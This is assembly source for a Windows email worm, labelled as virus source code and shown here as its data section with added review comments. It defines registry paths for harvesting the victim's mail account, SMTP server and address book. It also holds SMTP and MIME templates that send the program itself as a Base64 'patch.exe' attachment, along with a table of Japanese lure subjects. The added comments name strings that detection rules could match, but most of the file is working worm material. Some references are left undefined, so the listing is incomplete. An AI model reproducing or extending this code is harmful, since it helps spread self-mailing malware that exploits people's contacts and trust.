
📄 japanize.asm

📁 此為病毒源碼
	
	; Assembler setup (TASM-style directives): Pentium instruction set with
	; privileged opcodes accepted, 32-bit flat memory model.
	.586p
	.model flat
	; `locals` turns on block-scoped local labels; `jumps` lets the assembler
	; rewrite out-of-range conditional jumps automatically.
	locals
	jumps

	
;;;  some lazy shit
;;;  callW <name>: declare <name> as an external procedure and call it in
;;;  one step, so API imports need no separate extrn list. Every expansion
;;;  re-emits the extrn line for its argument.
;;;  NOTE(review): each imported API name therefore appears at its call
;;;  site; the call sites themselves are outside this part of the listing.
callW  macro	@@@x
	extrn	@@@x:proc
	call	@@@x
endm

; Shorthand for the `offset` operator, used below in `$ - ofs label`
; length computations.
ofs equ offset

; Shorthand operand-size overrides.
dwo equ dword ptr
wo equ word ptr
by equ byte ptr

; Win32 / Winsock constants, defined locally instead of via an include file.
HKEY_CURRENT_USER	EQU	80000001h
CRLF		equ 	<13,10>
; Text macro that emits the word 310Fh, i.e. the bytes 0Fh 31h (the RDTSC
; opcode) as raw data wherever `rdtsc` is written.
; NOTE(review): no use of it is visible in this part of the listing.
rdtsc	equ	<dw 310fh>
AF_INET		equ	2
SOCK_STREAM	equ	1

; File, mapping and global-memory flags (CreateFile / CreateFileMapping /
; MapViewOfFile / GlobalAlloc values). GHND = GMEM_MOVEABLE or GMEM_ZEROINIT.
FILE_ATTRIBUTE_NORMAL	EQU	00000080h
GENERIC_READ		EQU	80000000h
GENERIC_WRITE		EQU	40000000h
PAGE_READONLY		EQU	00000002h
PAGE_READWRITE		EQU	00000004h
FILE_MAP_READ		EQU	00000004h
OPEN_EXISTING		EQU	00000003h
GHND			EQU	042h
FILE_SHARE_READ		EQU	00000001h
FILE_SHARE_WRITE	EQU	00000002h
 

;;;  ----------------------------------------------------------------
	.data
;;;  Registry key and value names, plus the buffers that receive their data.
;;;  The key names are the per-user Internet Account Manager (mail account)
;;;  settings and the Windows Address Book file location.
;;;  NOTE(review): the code that opens and queries these keys is not in this
;;;  part of the listing. For defenders, a process other than the mail client
;;;  reading these keys is a useful host-based signal.
hReg				dd	?;  registry handle
str_SMInternetAccountManager	db	'Software\Microsoft\Internet Account Manager',0
; No terminating 0 here: AccountIdx follows immediately, so whatever is
; written into AccountIdx extends this string into a full
; ...\Accounts\<index> key path. Do not reorder these two lines.
str_SMIAccounts			db	'Software\Microsoft\Internet Account Manager\Accounts\'
AccountIdx			db	9 dup(?);  account index
bufsiz_accountidx		dd	9;  size
	
; Value names; presumably looked up under the keys above -- confirm against
; the query code.
str_DMA				db	'Default Mail Account',0
str_SMTPNAME			db	'SMTP Server',0
str_SMTPEmailAddr		db	'SMTP Email Address',0
str_SMWab4			db	'Software\Microsoft\WAB\WAB4\Wab File Name',0


; Each output buffer is paired with a dword holding its size in bytes.
; NOTE(review): these dwords look like in/out length arguments for the
; registry query. If the query call updates them, they must be reset before
; reuse -- verify against the caller.
SMTP_Server			db	50 dup(?)	;  default smtp server
bufsiz_SMTPSERVER		dd	50
morons_Mailaddr			db	256 dup(?)	;  mail address of moron :)
bufsiz_morons_mailaddr		dd	256
wab4_path			db	260 dup(?);  wab file path
bufsiz_wab4_path		dd	260

; General-purpose 1000-byte scratch buffer (use not visible in this part).
buffer	db	1000 dup(?)

; Handles for reading the address-book file through a file mapping.
hwab4file	dd	?		;  wab4 file handle
hwab4map	dd	?		;  presumably the file-mapping handle -- confirm
hwab4mapview	dd	?		;  presumably the mapped view base address -- confirm

; NOTE(review): the original comment read "handle of myself", but this is a
; 260-byte buffer, so it presumably holds the program's own file path; the
; handle is hmyfile below.
myfilename	db	260 dup(?)	;  own file name buffer (260 bytes)
hmyfile		dd	?
fsize		dd	?		;  file size

; Global-memory bookkeeping. The names suggest one block for a copy of the
; program's own file and one for its Base64-encoded form -- TODO confirm.
hmemout0	dd	?
ptr_myself	dd	?
hmemout		dd	?		;  globalalloc
ptr_base64buf	dd	?		;  globallock

target_mailaddr	db	48h dup(?)	;  recipient address buffer, 48h (72) bytes -- no size dword accompanies it

; Winsock sockaddr_in laid out field by field: family, port, IPv4 address,
; 8 bytes of padding. len_sockaddr_in therefore evaluates to 16.
sockaddr_in	label byte		;
	sin_family	dw	?
	sin_port	dw	?
	sin_addr	dd	?
	sin_zero	db	8 dup(?)
len_sockaddr_in	=	$ - ofs sockaddr_in

sock	dd	?			;  socket descriptor

recv_buffer	db	1024	dup(?)	;  recv buffer

jflag		dd	0		;  japanese or not

; SMTP command fragments and the fixed message template. Each string is
; followed by a len_* symbol computed as `$ - ofs <label>`, so the length
; line must stay directly after its string.
;
; Detection note: the constant HELO argument, the literal subject line, the
; MIME boundary string and the attachment name/content type below are fixed
; text in this data section. That makes them candidate static indicators for
; mail-gateway rules or string signatures.
smtp_HELO	db	'HELO localhost',CRLF
len_smtp_HELO	=	$ - ofs smtp_HELO
smtp_MAIL_FROM	db	'MAIL FROM: '
len_smtp_MAIL_FROM	=	$ - ofs smtp_MAIL_FROM
;crlf  (the command has no CRLF of its own; an address and smtp_crlf are presumably sent after it)
smtp_RCPT_TO	db	'RCPT TO: '
len_smtp_RCPT_TO	=	$ - ofs smtp_RCPT_TO
;crlf  (same pattern as MAIL FROM above)
smtp_DATA	db	'DATA',CRLF
len_smtp_DATA	=	$ - ofs smtp_DATA
; Message header fragments; the TO and SUBJECT pieces begin with CRLF, which
; ends the preceding header line.
smtp_BODY_FROM	db	'FROM: '
len_smtp_BODY_FROM	=	$ - ofs smtp_BODY_FROM
smtp_BODY_TO	db	CRLF,'TO: '
len_smtp_BODY_TO	=	$ - ofs smtp_BODY_TO
smtp_BODY_SUBJECT	db	CRLF,'SUBJECT: Important',CRLF
len_smtp_BODY_SUBJECT	=	$ - ofs smtp_BODY_SUBJECT

; End-of-DATA marker and session close.
smtp_DOT_CRLF	db	'.',CRLF
len_smtp_DOT_CRLF	=	$ - ofs smtp_DOT_CRLF
smtp_QUIT	db	'QUIT',CRLF
len_smtp_QUIT	=	$ - ofs smtp_QUIT

; Bare CRLF with no len_* symbol; its length is 2 bytes.
smtp_crlf	db	CRLF

; multipart/mixed template: an empty text/plain part declared as iso-2022-jp,
; followed by the headers of a Base64 attachment part named "patch.exe".
smtp_MIME_h	db	'MIME-Version: 1.0',CRLF
	db	'Content-Type: multipart/mixed; boundary="Boundary-a8dfidaoRadvfuck"',CRLF
	db	CRLF
	db	'--Boundary-a8dfidaoRadvfuck',CRLF
	db	'Content-Type: text/plain; charset=iso-2022-jp',CRLF
	db	'Content-Transfer-Encoding: 7bit',CRLF
	db	'Content-Description: Mail message body',CRLF
	db	CRLF
	db	CRLF			;  text
	db	CRLF
	db	'--Boundary-a8dfidaoRadvfuck',CRLF
	db	'Content-Type: application/x-msdownload; name="patch.exe"',CRLF
	db	'Content-Disposition: attachment;  filename="patch.exe"',CRLF
	db	'Content-Transfer-Encoding: BASE64',CRLF
	db	CRLF
len_smtp_MIME_h	=	$ - ofs smtp_MIME_h
	;;  base64 body  (attachment data goes between smtp_MIME_h and smtp_MIME_e)
; Closing boundary for the multipart message.
smtp_MIME_e	db	CRLF,'--Boundary-a8dfidaoRadvfuck--',CRLF,CRLF
len_smtp_MIME_e	=	$ - ofs smtp_MIME_e

; State word for the random-number routine, with a fixed initial value.
; NOTE(review): the generator and any reseeding are not in this part of the
; listing.
r_seed		dd	10987293h	;  random seed


; Prefix and suffix of an RFC 2047 encoded-word subject header: charset
; ISO-2022-JP, "B" (Base64) encoding. An encoded subject string is presumably
; sent between the two pieces -- confirm against the sending code.
smtp_jsubject_1	db	CRLF,'SUBJECT: =?ISO-2022-JP?B?'
len_smtp_jsubject_1	=	$ - ofs smtp_jsubject_1
smtp_jsubject_2	db	'?=',CRLF
len_smtp_jsubject_2	=	$ - ofs smtp_jsubject_2


;;;  japanese subjects table
;;;  Table of 17 dword pointers to zero-terminated subject strings. Each string
;;;  is the Base64 form of ISO-2022-JP text; the trailing comments give the
;;;  decoded meaning in English (the originals were mis-encoded on this page).
;;;  num_of_jsub is the table size in bytes divided by 4, i.e. the entry count.
;;;  NOTE(review): js_16 and js_17 are referenced here but their definitions
;;;  are not in the visible listing, which appears to be truncated after js_15.
;;;  Detection note: these exact Base64 strings, with and without the "UmU6"
;;;  ("Re:") prefix, are fixed text and can serve as subject-line indicators.
japanese_subjects	label	byte
	dd	ofs js_01
	dd	ofs js_02
	dd	ofs js_03
	dd	ofs js_04
	dd	ofs js_05
	dd	ofs js_06
	dd	ofs js_07
	dd	ofs js_08
	dd	ofs js_09
	dd	ofs js_10
	dd	ofs js_11
	dd	ofs js_12
	dd	ofs js_13
	dd	ofs js_14
	dd	ofs js_15
	dd	ofs js_16
	dd	ofs js_17
num_of_jsub	=	($ - ofs japanese_subjects)/4
js_01	db	'GyRCPUVNVxsoQg==',0	;  "Important"
js_02	db	'UmU6GyRCPUVNVxsoQg==',0;  "Re:Important"
js_03	db	'GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0;  "Important notice"
js_04	db	'UmU6GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0;  "Re:Important notice"
js_05	db	'GyRCTmMkTjdvGyhC',0	;  "About that matter"
js_06	db	'UmU6GyRCTmMkTjdvGyhC',0;  "Re:About that matter"
js_07	db	'GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0;  "Long time no see"
js_08	db	'UmU6GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0;  "Re:Long time no see"
js_09	db	'GyRCJDMkcyRLJEEkTxsoQg==',0;  "Hello"
js_10	db	'UmU6GyRCJDMkcyRLJEEkTxsoQg==',0;  "Re:Hello"
js_11	db	'GyRCNktIaxsoQg==',0	;  "Top secret"
js_12	db	'UmU6GyRCNktIaxsoQg==',0;  "Re:Top secret"
js_13	db	'GyRCO3FOQRsoQg==',0	;  "Documents"
js_14	db	'UmU6GyRCO3FOQRsoQg==',0;  "Re:Documents"
js_15	db	'GyRCMz8bKEI=',0	;  single-character subject; original comment unreadable -- decode to confirm
